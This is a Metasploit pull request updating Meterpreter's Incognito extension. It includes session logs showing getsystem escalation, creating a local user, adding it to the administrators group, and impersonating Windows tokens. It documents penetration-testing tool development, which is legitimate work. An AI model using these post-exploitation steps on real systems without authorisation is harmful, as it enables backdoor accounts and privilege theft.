This repository has been archived by the owner on Jan 22, 2024. It is now read-only.

Update to Incognito v2 #42

Merged
merged 2 commits into from
Nov 6, 2013

OJ (Contributor) commented Oct 29, 2013

Note: this PR relies on the VS2013 upgrade PR, so that needs to be merged first.

This commit updates to the latest version of the incognito code from: http://labs.mwrinfosecurity.com/blog/2012/07/18/incognito-v2-0-released/

This included a fix for Windows 2003 x64, which was reported as a bug in RM 8281.

Sample output post-fix:

```
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeIncreaseQuotaPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemProfilePrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeRemoteShutdownPrivilege
  SeUndockPrivilege
  SeManageVolumePrivilege

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
OJ-Y433WVQI694X\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
```

Test run on the same machine to make sure we haven't broken anything that was working before in other areas of incognito.

Adding users:

```
meterpreter > add_user fido fido
[*] Attempting to add user fido to host 127.0.0.1
[+] Successfully added user

meterpreter > shell
Process 2708 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            fido                     Guest
SUPPORT_388945a0
The command completed with one or more errors.
```

Adding the user to a group:

```
meterpreter > add_localgroup_user administrators fido
[*] Attempting to add user fido to localgroup administrators on host 127.0.0.1
[+] Successfully added user to local group
meterpreter > shell
Process 2820 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
fido
The command completed successfully.
```

Impersonation:

```
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
OJ-Y433WVQI694X\Administrator
OJ-Y433WVQI694X\fido

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token OJ-Y433WVQI694X\\fido
[+] Delegation token available
[+] Successfully impersonated user OJ-Y433WVQI694X\fido
meterpreter > getuid
Server username: OJ-Y433WVQI694X\fido
```

[FixRM #8281]

OJ added 2 commits October 29, 2013 13:46
Pulled the latest version of the incognito code from:
http://labs.mwrinfosecurity.com/blog/2012/07/18/incognito-v2-0-released/

This included a fix for Windows 2003 x64, which was reported as a bug in
RM 8281.

@metasploit-public-bot

Merged build finished.

@metasploit-public-bot

Test PASSED.
Refer to this link for build results: https://ci.metasploit.comjob/GPR-MeterpreterWin/3/

todb-r7 pushed a commit to todb-r7/meterpreter that referenced this pull request Nov 4, 2013
todb-r7 pushed a commit to todb-r7/meterpreter that referenced this pull request Nov 6, 2013
@todb-r7 todb-r7 mentioned this pull request Nov 6, 2013
todb-r7 pushed a commit that referenced this pull request Nov 6, 2013
This lands #39, #42, and #43. #34 still needs work.
@todb-r7 todb-r7 merged commit 5117030 into rapid7:master Nov 6, 2013
@OJ OJ deleted the incognito_update_8281 branch November 7, 2013 04:57